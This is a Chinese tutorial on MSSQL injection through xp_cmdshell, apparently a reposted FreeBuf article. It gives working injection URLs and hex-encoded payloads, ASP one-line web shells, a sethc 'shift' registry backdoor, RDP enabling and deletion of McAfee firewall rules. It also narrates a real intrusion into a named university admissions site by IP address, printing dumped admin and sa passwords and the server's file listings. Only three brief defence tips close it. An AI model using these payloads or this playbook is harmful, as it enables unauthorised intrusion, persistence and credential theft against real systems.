技术分享:MSSQL注入xp_cmdshell


发布人:admin分类:网络安全浏览量:29发布时间:2017-12-12

存储过程为数据库提供了强大的功能,其类似UDF,在MSSQL中xp_cmdshell可谓臭名昭著了。MSSQL强大的存储过程也为黑客提供了遍历,在相应的权限下,攻击者可以利用不同的存储过程执行不同的高级功能,如增加MSSQL数据库用户,枚举文件目录等等。而这些系统存储过程中要数xp_cmdshell最强大,通过该存储过程可以在数据库服务器中执行任意系统命令。MSSQL2005,2008等之后版本的MSSQL都分别对系统存储过程做了权限控制以防止被滥用。

EXEC master.dbo.xp_cmdshell 'ipconfig'

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。

EXEC sp_configure 'show advanced options',1//允许修改高级参数
RECONFIGURE
EXEC sp_configure 'xp_cmdshell',1  //打开xp_cmdshell扩展
RECONFIGURE

开启后执行语句

除了xp_cmdshell还有操作注册表的

xp_regaddmultistring
xp_regdeletekey //删除键
xp_regdeletevalue //删除值
xp_regenumkeys
xp_regenumvalues //返回多个值
xp_regread //读取键值
xp_regremovemultistring
xp_regwrite //写入键值 
控制服务的xp_servicecontrol等
开启telnet服务
execmaster..xp_servicecontrol 'start', 'tlntsvr'

测试

/2.aspx id=999999.9+union+all+select+%28select+cast%28Char%28114%29%2bChar%2851%29%2bChar%28100%29%2bChar%28109%29%2bChar%2848%29%2bChar%28118%29%2bChar%2851%29%2bChar%2895%29%2bChar%28104%29%2bChar%28118%29%2bChar%28106%29%2bChar%2895%29%2bChar%28105%29%2bChar%28110%29%2bChar%28106%29%2bChar%28101%29%2bChar%2899%29%2bChar%28116%29%2bChar%28105%29%2bChar%28111%29%2bChar%28110%29+as+nvarchar%284000%29%29%29%2Cnull%2Cnull--

url解码

删除空格+,转换Asc,比较简单的语句就不注释了

id=999999.9+union+all+select+(select+cast(Char(114)+Char(51)+Char(100)+Char(109)+Char(48)+Char(118)+Char(51)+Char(95)+Char(104)+Char(118)+Char(106)+Char(95)+Char(105)+Char(110)+Char(106)+Char(101)+Char(99)+Char(116)+Char(105)+Char(111)+Char(110)+as+nvarchar(4000))),null,null--

cast字符类型转换

CAST ( expression AS data_type [ ( length ) ] )
id=999999.9 union all select (select cast(r3dm0v3_hvi_iniectionas nvarchar(4000))),null,null—
//相当于 select r3dm0v3_hvi_iniection,null,null-- 
/2.aspx id=999999.9+union+all+select+null,char(126)+char(39)+cast(db_name()+COLLATE+SQL_Latin1_General_Cp1254_CS_AS+as+nvarchar(4000))+char(39)+char(126),null--

获取当前数据库名字

/2.aspx
id=999999.9+union+all+select+null,~'cast(db_name()COLLATE SQL_Latin1_General_Cp1254_CS_AS/*进行排序,并转换成nvarchar类型*/ as nvarchar(4000))'~,null-- 
开启xp_cmdshell
/2.aspx
id=1;EXEC sp_configure 'show advancedoptions',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE--

OleAutomation Procedures

/2.aspx id=1;exec+sp_configure+'show+advanced+options',1;RECONFIGURE;exec+sp_configure+'Ole+Automation+Procedures',1;RECONFIGURE--

执行命令

1,创建一个包含两个字段tmp1,tmp2的r3dm0v3_sql表

/2.aspxid=1;+CREATE+TABLE+r3dm0v3_sql+(tmp1+varchar(8000),tmp2+varchar(8000))--

2,将执行结果存入tmp1表中

/2.aspxid=1;+insert+into+r3dm0v3_sql+(tmp1)+exec+master..xp_cmdshell+'net+user'—

3,存储过程,将tmp1字段中所有不为空内容读取到tmp2字段中,并在前面加入~。

/2.aspx
id=1;
begin
declare @ret varchar(8000)
set @ret=''
select @ret=@ret '~' tmp1 from r3dm0v3_sqlwhere tmp1>@ret insert into r3dm0v3_sql(tmp2)
select @ret
end--

4,从tmp2表中查询不为空的数据,Havij会在查询的数据前后加入~'数据内容'~,这也是他的一个特点。

/2.aspx id=999999.9+union+all+select+null,(select+top+1+char(126)+char(39)+cast(tmp2+as+varchar(8000))+COLLATE+SQL_Latin1_General_Cp1254_CS_AS+char(39)+char(126)+from+r3dm0v3_sql+where+tmp2<>''),null--

5,删除表

/2.aspx id=1%3B+drop+table+r3dm0v3_sql--

高级入侵

不过当用户已AUTHORITY\NetworkService登陆时时(mssql2005express版默认)无法执行net user命令添加用户的,不过默认安装的mssql2005企业版是以本地系统账户登陆的

当以本地用户登录的时候执行命令 

sp_makewebtask写入一句话

如果未启用Web Assistant Procedures

SQLServer 阻止了对组件 'WebAssistant Procedures' 的 过程'sys.xp_makewebtask' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。

开启

exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE

写码

exec sp_makewebtask 'c:\1.asp','select''<%execute(request("ruo"))%>'''
<HTML>
<HEAD>
<META content="text/html;charset=utf-8" http-equiv=Content-Type>
<TITLE>Microsoft SQL Server Web 助手</TITLE>
</HEAD>
<BODY>
<H1>查询结果</H1>
<HR>
<PRE><TT>上次更新时间: 2014-12-2511:36:23.560</TT></PRE>
<P>
<P><TABLE BORDER=1>
<TR><THALIGN=LEFT>n/a</TH></TR>
<TR><TD><TT><%execute(request("ruo"))%></TT></TD></TR>
</TABLE>
<HR>
</BODY>
</HTML>

一条语句写入文件到c:\1.asp

http://192.168.1.145/2.aspx?id=2;exec sp_configure0x730068006f007700200061006400760061006e0063006500640020006f007000740069006f006e007300/*showadvanced options*/, 1;
reconfigure;
exec sp_configure0x570065006200200041007300730069007300740061006e0074002000500072006f006300650064007500720065007300/*Web Assistant Procedures*/,1;
reconfigure;
declare @snvarchar(4000);
select@s=0x730065006c00650063007400200027003c00250045007800650063007500740065002800720065007100750065007300740028002200720075006f0022002900290025003e000d000a002700/*select '<%Execute(request("ruo"))%> '*/;
execsp_makewebtask 0x43003a005c0031002e00610073007000/*C:\1.asp*/, @s;--

如果存储过程xp_cmdshell被删除,重修加载,如果是xplog70.dll文件被删除了还是别想了吧

dbcc addextendedproc("sp_oacreate","odsole70.dll")
dbcc addextendedproc("xp_cmdshell","xplog70.dll")

如果模块不存在

消息17750,级别16,状态0,过程xp_makewebtask,第1 行
无法加载DLL xpweb90.dll 或它引用的一个DLL。原因:126(找不到指定的模块。)。

mssql2005 express版的缺少一些组件,写入文件时无法加载xpweb90.dll,拖入mssql2005企业版xpweb.dll无法加载,这个版本不知怎么写入文件。

以本地系统账户登陆

消息17750,级别16,状态0,过程xp_makewebtask,第1 行
无法加载DLL xpweb90.dll 或它引用的一个DLL。原因:1114(动态链接库(DLL)初始化例程失败。)。

网络账户NT AUTHORITY\NetworkService

消息17750,级别16,状态0,过程xp_makewebtask,第1 行
无法加载DLL xpweb90.dll 或它引用的一个DLL。原因: 5(拒绝访问。)。

注册表操作

启用存储过程

exec sp_addextendedprocxp_regread,'xpstar.dll'

http://192.168.1.145/2.aspx?id=2

;exec master.dbo.sp_addextendedproc0x780070005f007200650067007200650061006400,0x7800700073007400610072002e0064006c006c00--

xp_regread à 16进制78 70 5F 72 65 67 72 65 61 64

读取键值计算机名

xp_regread 根键,子键,键值名

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\ComputerName\ComputerName
ComputerName

建表

http://192.168.1.145/2.aspx?id=2 ;createtable [pangolin_test_table]([a] nvarchar(4000) null);--

读取值并写入到表中

http://192.168.1.145/2.aspx?id=2;declare @s nvarchar(4000)exec master.dbo.xp_regread
0x484b45595f4c4f43414c5f4d414348494e45/*表项HKEY_LOCAL_MACHINE*/,0x53595354454d5c436f6e74726f6c5365743030315c436f6e74726f6c5c436f6d70757465724e616d655c436f6d70757465724e616d65/*子项SYSTEM\ControlSet001\Control\ComputerName\ComputerName*/,0x436f6d70757465724e616d65/*健名ComputerName*/,
@s outputinsert intopangolin_test_table (a)values(@s);--

查询

http://192.168.1.145/2.aspx?id=2 and(select top 1 a from pangolin_test_table)>0--
http://192.168.1.145/2.aspx?id=2 ;droptable [pangolin_test_table];--

注:子项路径中有空格没法找到路径

写入注册表值

xp_regwrite 根键,子键, 值名, 值类型, 值

exec xp_regwrite

0x484b45595f4c4f43414c5f4d414348494e45/*HKEY_LOCAL_MACHINE*/,
0x534f4654574152455c4d6963726f736f66745c57696e646f77735c43757272656e7456657273696f6e5c52756e/*SOFTWARE\Microsoft\Windows\CurrentVersion\Run */,
0x74657374/*test*/,
0x5245475f535a/*REG_SZ*/,

'c:\2.exe' — /* mssql2005 express版我测试这里不能用十六进制的格式了,不然会出现错误执行xp_regwrite 扩展存储过程时出错: 注册表REG_(MULTI)_SZ 值不匹配*/

写入shift后门

exec xp_regwrite
'HKEY_LOCAL_MACHINE',
'SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Options\sethc.exe',
'debugger',
'REG_SZ',
'c:\\windows\\system32\\taskmgr.exe'

16进制编码

exec xp_regwrite
0x484b45595f4c4f43414c5f4d414348494e45,
0x534f4654574152455c4d6963726f736f66745c57696e646f7773204e545c43757272656e7456657273696f6e5c496d6167652046696c6520457865637574696f6e204f7074696f6e735c73657468632e657865,
0x6465627567676572,
0x5245475f535a,

'c:\\windows\\system32\\taskmgr.exe'–

 

查看远程桌面开启

exec xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections'

开启远程桌面

exec xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections',
'REG_DWord',0

入侵实例

西南明大招生就业网

http://222.210.17.165/selects.asp?Key=1

后台

http://222.210.17.165/admin/login.asp

web server operating system: Windows 2003or XP
web application technology: ASP.NET,Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

Database: zsweb
[33 tables]

+---------------------------------------------------+
| ArtWebStudent                                     |
| D99_CMD                                           |
| D99_REG                                           |
| D99_Tmp                                           |
| DIY_TEMPCOMMAND_TABLE                             |
| KS_AdminX(管理员表)                                         |
| KS_Cls                                            |
| KS_Down                                           |
| KS_GuestBook                                      |
| KS_Job                                            |
| KS_Mail                                           |
| KS_Member                                         |
| KS_News                                           |
| KS_P_Str                                          |
| KS_P_Text                                         |
| KS_Page                                           |
| KS_Person                                         |
| KS_Pro                                            |
| KS_VoteOption                                     |
| KS_VoteTopic                                      |
| LqHistory                                         |
| Plan                                              |
| Student                                           |
| WebBm                                             |
| area                                              |
| class                                             |
| comd_list                                         |
| dtproperties                                      |
| labeng                                            |
| major                                             |
| majorsubject                                      |
| province                                          |
| subject                                           |
+---------------------------------------------------+

sqlmap.py -u"http://222.210.17.165/selects.asp?key=1" -D zsweb -T KS_AdminX –columns

Database: zsweb

Table: KS_AdminX

[7 columns]

+---------------+---------------+
| Column        | Type          |
+---------------+---------------+
| AddTime       | smalldatetime |
| ID            | int           |
| LastLoginIP   | varchar       |
| LastLoginTime | smalldatetime |
| UserLoginName | varchar       |
| UserLoginPWD  | varchar       |
| UserRealName  | varchar       |
+---------------+---------------+
sqlmap.py -u"http://222.210.17.165/selects.asp?key=1" -D zsweb -T KS_AdminX –CUserLoginName, UserLoginPWD --dump

Database: zsweb

Table: KS_AdminX

[1 entry]

+--------------+---------------+
| UserLoginPWD | UserLoginName |
+--------------+---------------+
| 859911       | admin         |
+--------------+---------------+

后台没发下可以利用的地方

sqlmap.py -u http://222.210.17.165/selects.asp?key=1--os-shell

通过后台上传图片文件,再dir目录查看文件内容,确定D:\web\为网站目录

网站绝对路径

D:\web\ ewebeditor\uploadfile\20141226165819600.jpeg
http://222.210.17.165/ewebeditor/uploadfile/20141226165819600.jpeg

d:\web 的目录

2014-11-08 09:26    <DIR>          .
2014-11-08 09:26    <DIR>          ..
2012-12-19 00:40             4,991 about.asp
2009-04-20 03:37             4,013aboutTemp.asp
2009-04-20 03:37            10,451 aboutW.asp
2014-11-06 13:08    <DIR>          Admin
2010-01-12 20:26             4,846ArtBkxz.asp
2010-01-09 11:14             2,280artbmleft.asp
2010-01-09 13:04               650artbmlogin.asp
2010-01-09 13:46             9,382ArtBmPrint.asp
2013-09-21 20:27    <DIR>          aspnet_client
2009-04-10 11:21            11,036 bkgl.asp
2010-01-09 21:44            12,507 BmOk.asp
2009-04-07 18:31               419 boot.htm
2009-03-15 16:49               424 close.html
2010-01-04 14:39               149 conn.asp
2009-04-20 03:48               952contact.asp
2009-04-22 22:39             1,567 css.css
2008-07-03 11:09             1,274 css1.css
2013-09-21 20:27    <DIR>          DataBaseJKZY
2014-07-29 00:38    <DIR>          ewebeditor
2009-04-10 11:21            11,042 gkkx.asp
2011-03-22 16:56             4,687gklqcxn.asp
2010-01-07 13:34            14,807 head.asp
2014-10-20 01:36    <DIR>          images
2014-10-20 01:36    <DIR>          Include

目录文件太多了省略一万字….

写入文件

Echo imruo >> d:\web\zhao\1.txt 不能写入asp,asa文件 aspx文件无法执行,没有注册.net

查看进程,发现McAfee安全软件

Tasklist

映像名称                       PID 会话名              会话#       内存使用
========================= ======================== =========== ============
System Idle Process              0 Console                    0         28 K
System                           4 Console                    0        312 K
smss.exe                       412 Console                    0        564 K
csrss.exe                      468 Console                    0      6,896 K
winlogon.exe                   492 Console                    0     43,556 K
services.exe                   540 Console                    0     28,700 K
lsass.exe                      552 Console                    0     37,548 K
svchost.exe                    724 Console                    0     18,200 K
FireSvc.exe                   // McAfeeDesktopFirewall防火墙服务进程
inetinfo.exe                  1096 Console                    0     36,732 K
FrameworkService.exe          1148 Console                    0      1,772 K
VsTskMgr.exe                  // McAfee
mfevtps.exe                   1320 Console                    0      5,808 K
mfeann.exe                    1340 Console                    0      3,640 K
naPrdMgr.exe                  // McAfee
sqlservr.exe                  1544 Console                    0  1,178,252 K
msmdsrv.exe                   1556 Console                    0     24,968 K
svchost.exe                   1684 Console                    0     30,436 K
vmware-converter-a.exe        1752 Console                    0     44,052 K
vmware-converter.exe          1824 Console                    0     42,764 K
vmware-converter.exe          1912 Console                    0     47,268 K
svchost.exe                   1948 Console                    0     18,148 K
searchindexer.exe             1972 Console                    0      7,728 K
mcshield.exe                  // McAfee VirusScan 的一个核心进程
mfefire.exe                   // mcafee网络安全程序
msftesql.exe                  2184 Console                    0      4,564 K
wmiprvse.exe                  3580 Console                    0      5,660 K
logon.scr                    //屏保程序
w3wp.exe                     2172Console                    0     30,708 K
davcdata.exe                  // Microsoft HTTP-DAV commondata

尝试写入cer,竟然可以执行,哈哈,上菜刀了

Echo "<%Execute(request("a"))%>">> d:\web\zhao\1.cer (备份D:\web\Admin\Images\1.cer)

数据库连接文件

D:\web\conn.asp
<%
'数据库连接
Setwebconn=CreateObject("ADODB.Connection")
webconn.Open "DRIVER={SQLServer};server=(local);uid=sa;pwd=000000;database=zsweb"
%>

服务器提权

开启3389导入shift后门

菜刀上传开启3389reg,xp_shell导入远程桌面仍然无法连接

Regedit /s d:\web\rdp.reg

导出注册表

regedit /e d:\web\zhao\aaa.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer\Wds\rdpwd\Tds\tcp"

主机装有McAfee Host Intrusion Prevention,本地测试下载到到的版本,发现目标用的是8.0的,然后考虑将配置文件下载下来覆盖本地的查看服务器hip规则,无意中发现某站提到mcafee hip配置文件在注册表中HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP,导出注册表覆盖本地发现3389访问限制了ip

既然通过注册表配置,那么我将远程ip地址修改后再导入注册表不就绕过了ip的限制了,想想连我都佩服我的机智。

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\McAfee\HIP\Config\Firewall\AggrMatches\4\Matches]
"0"="15,1,0,false,false,true,221.10.*.*,,"

不过测试还是无法连接,研究发现防火墙由两条注册表Matches,Rules决定,修改起来比较麻烦,还是将目标注册表规则删除,导入我们本地建立的吧。

reg delete HKLM\SOFTWARE\McAfee /f
Regedit /s d:\web\zhao\hip.reg

 

突破3389过滤后我们导入shift后门吧

Regedit /s d:\web\zhao\shift.reg

登陆权限为system权限,直接打开用户管理修改administrator密码

现在我是管理员了,想干什么就干什么了,呵呵呵。

如何防范?

1,删除存储过程execsp_dropextendedproc ‘xp_cmdshell’,最好删除xplog70.dll等文件
2,网站数据库不要使用sa账户,对服务运行权限设定为普通账户
3,安装相关安全软件

参考资料

http://blog.dt27.cn/default/hui_fu_xp_cmdshell_da_quan/ 
http://www.cnblogs.com/xred/archive/2011/12/31/2308724.html

[本文作者/ruo,属FreeBuf黑客与极客(FreeBuf.COM)原创文章,]


被黑站点统计 - 文章版权1、本主题所有言论和图片纯属会员个人意见,与本文章立场无关
2、本站所有主题由该文章作者发表,该文章作者与被黑站点统计享有文章相关版权
3、其他单位或个人使用、转载或引用本文时必须同时征得该文章作者和被黑站点统计的同意
4、文章作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
7、被黑站点统计管理员有权不事先通知发贴者而删除本文

免责声明

本站主要通过网络搜集国内被黑网站信息,统计分析数据,为部署安全型网络提供强有力的依据.本站所有工作人员均不参与黑站,挂马或赢利性行为,所有数据均为网民提供,提交者不一定是黑站人,所有提交采取不记名,先提交先审核的方式,如有任何疑问请及时与我们联系.

admin  的文章


微信公众号

微信公众号


Copyright © 2012-2022被黑网站统计系统All Rights Reserved
页面总访问量:21265776(PV) 页面执行时间:63.675(MS)
  • xml
  • 网站地图